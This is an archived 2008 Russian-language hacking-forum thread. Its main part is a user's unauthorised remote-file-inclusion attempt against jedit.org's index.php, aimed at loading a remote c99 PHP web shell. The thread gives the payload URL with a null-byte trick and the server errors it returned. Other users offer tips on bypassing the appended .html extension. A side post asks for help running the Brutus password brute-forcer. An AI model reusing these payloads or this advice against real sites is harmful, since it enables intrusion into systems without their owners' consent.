ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
02.04.2008, 01:10
|
|
Новичок
Регистрация: 31.03.2008
Сообщений: 2
Провел на форуме:
5572
Репутация:
0
|
|
Сообщение от Велемир
А какой конкретно брут? Их навалом ).Например, тот же Brutus AET 2 (кажись так:РР).Там можно настроить по многим протоколам,кроме ссл,но для этого другие бруты есть. Гайдов по нему тоже полно( на русском кстати) .Там должны быть настройки полным перебором, по словарю(он те наф не нужен).И указан диапазон фицр в виде 0123456789.Что-то вроде того:Р
Дело в том что перебирает 1 пароль и пишет ...due to unknown duration. От чего это может быть? В гайдах ничего не нашел.
|
|
|
01.04.2008, 17:41
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Warning: main(http://site/RamShellc99.php\0.html): failed to open stream: Connection refused in /home/groups/j/je/jedit/htdocs/index.php on line 63
Warning: main(): Failed opening 'http://site/RamShellc99.php\0.html' for inclusion (include_path='.:/usr/local/share/pear') in /home/groups/j/je/jedit/htdocs/index.php on line 63
Имеется запрос:
http://www.jedit.org/index.phppage=http://site/RamShellc99.php%00
В результате получается такое :
Warning: main(): Failed opening 'http://site/RamShellc99.php\0.html' for inclusion (include_path='.:/usr/local/share/pear') in /home/groups/j/je/jedit/htdocs/index.php on line 63
Я так понял,тут две веши:
1.У меня жутко кривые куриные лапы.
2.Фильтрация %0 на \
3.Какие-то проблемы с url- encoding ( ??? )
В данном случае, меня интересует , почему не заливается шелл =(. Про инклуды аля ../../../../../etc/pwd пожалуйста не надо)
|
|
|
|
01.04.2008, 18:46
|
|
Постоянный
Регистрация: 25.03.2008
Сообщений: 670
Провел на форуме:
4137635
Репутация:
2407
|
|
Некоторые мысли...
Скрипт их прибавляет расширение .html ко всему инклудящемуся, а %00 по-видимому не прокатывает.
По идее, можно переименовать шелл в нечто вроде shell.html и заставить апач на удалённом хосте исполнять html как php, но даже в этом случае вылетает ошибка failed to open stream: Connection timed out, почему - не знаю. (пытался ко многим сайтам так обращаться, везде тайм-аут, даже к их собственному)
|
|
|
|
01.04.2008, 18:57
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Сообщение от d_x
Некоторые мысли...
Скрипт их прибавляет расширение .html ко всему инклудящемуся, а %00 по-видимому не прокатывает.
По идее, можно переименовать шелл в нечто вроде shell.html и заставить апач на удалённом хосте исполнять html как php, но даже в этом случае вылетает ошибка failed to open stream: Connection timed out, почему - не знаю. (пытался ко многим сайтам так обращаться, везде тайм-аут, даже к их собственному)
Может я ща чё ляпну, но шеллкод разве может исполняться в любом файле ? (шеллкод системная с*ка  ) Мошь он просто выдаёт несоответствие расширений, и потому не исполняет. Ждём-с мнение экспертов ).
|
|
|
|
01.04.2008, 19:00
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
include($page.php) зло (
|
|
|
|
01.04.2008, 19:26
|
|
Познающий
Регистрация: 26.03.2008
Сообщений: 31
Провел на форуме:
208349
Репутация:
82
|
|
во-первых php код при инклуде будет выполнятся с любым расширеним
во-вторых дело тут не в экранировании нул-байта, а именно в проблеме доступа к удалённому хосту
Последний раз редактировалось Анжелика; 01.04.2008 в 19:30..
|
|
|
|
01.04.2008, 19:36
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Эмм... и в чём же там дело Ж(. Что делать то:Р
|
|
|
|
01.04.2008, 19:42
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
не надоело тебе сурсфордж ломать? я же сказал в прошлоых постах что там url access disabled + magic quotes on
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
01.04.2008, 19:46
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
))))))))))))))))))))))). лучшеб объяснил бы, где первое выставляется на серве :Р. А Через Post- запросы тоже чтоль никаг ? о_О...... * Ушёл весь раскрасневшийся*.
|
|
|
|
01.04.2008, 19:49
|
|
Постоянный
Регистрация: 25.03.2008
Сообщений: 670
Провел на форуме:
4137635
Репутация:
2407
|
|
Может я ща чё ляпну, но шеллкод разве может исполняться в любом файле ? (шеллкод системная с*ка ) Мошь он просто выдаёт несоответствие расширений, и потому не исполняет. Ждём-с мнение экспертов ).
Я имел в виду не шелл-код а php-шелл
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
